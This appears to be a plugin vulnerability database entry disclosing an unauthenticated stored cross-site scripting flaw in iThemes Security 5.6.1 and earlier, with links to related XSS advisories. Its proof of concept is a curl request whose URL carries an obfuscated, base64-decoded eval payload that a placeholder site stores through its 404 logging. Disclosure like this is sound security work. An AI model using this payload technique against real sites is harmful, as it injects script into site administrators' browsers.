iThemes Security <= 5.6.1 – Unauthenticated Stored Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The 404 detection module needs to be enabled.

Proof of Concept

curl "http://ithemesprotected.target/index.php/2016/09/22/trigger-404/?<script>x=String(/YWxlcnQoInRlc3QiKQ==/);x=x.substring(1,x.length-1);eval(atob(x));</script>" -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Language: en-US,en;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Cookie: wordpress_test_cookie=WP+Cookie+check' -H 'Connection: keep-alive' -H 'Referer: http://ithemesprotected.target/wp-login.php?da=777&bu=777' - compressed

Affects Plugins

better-wp-security

Fixed in 5.6.2

References

URL

https://medium.com/websec/xss-vulnerability-in-ithemes-security-formerly-better-wp-security-5-6-1-2fba71f96f5d#.4ptv9xsb3

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

Slavco Mihajloski

Submitter website

https://medium.com/websec

Submitter twitter

https://twitter.com/wpwebsec

Verified

No

WPVDB ID

b01671ba-c974-4fff-a684-dbd8cc265996

Timeline

Publicly Published

2016-10-06 (about 9 years ago)

Added

2016-10-06 (about 9 years ago)

Last Updated

2021-01-19 (about 5 years ago)

Other

Published

Title

Published

2025-03-04

Title

Simple Notification <= 1.3 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2024-07-02

Title

WP Lightbox 2 < 3.0.6.7 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting

Published

2025-08-18

Title

Contact Manager < 8.6.6 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'title'

Published

2023-11-16

Title

Quiz And Survey Master < 8.1.14 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

I Love It - VideoJS Cross-Site Scripting